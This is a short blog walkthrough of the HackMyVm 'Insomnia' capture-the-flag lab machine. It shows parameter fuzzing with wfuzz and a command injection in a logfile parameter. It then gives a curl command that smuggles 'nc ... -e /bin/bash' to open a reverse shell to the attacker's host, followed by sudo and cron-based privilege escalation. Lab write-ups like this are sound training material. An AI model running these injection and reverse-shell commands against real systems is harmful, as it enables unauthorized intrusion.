Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Insomnia Walkthrough (RCE)

Machines can be download here.



Nmap scan ports.

图片.png


Gobuster scan files and folders.

图片.png


Visit main page, get chat window.

图片.png


Visit chat.txt, chat history is here.

图片.png


Visit administration.php, get error.

图片.png


There should be some parameter for administration.php.

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt   'http://192.168.56.56:8080/administration.php?FUZZ=test'

图片.png


Exclude 65ch length response.

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hh 65  'http://192.168.56.56:8080/administration.php?FUZZ=test'

图片.png


curl http://192.168.56.56:8080/administration.php\?logfile\=administration.php\;id

Check chat.txt.

图片.png


There is RCE. Get reverse shell now.

curl http://192.168.56.56:8080/administration.php\?logfile\=administration.php\;nc%20192.168.56.100%201234%20-e%20/bin/bash

图片.png


sudo -l

图片.png


cat /var/www/html/start.sh

图片.png


echo bash >/var/www/html/start.sh
sudo -u julia /bin/bash /var/www/html/start.sh

图片.png


Check crontab.

图片.png


Add reverse shell code into check.sh, and wait.

图片.png

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0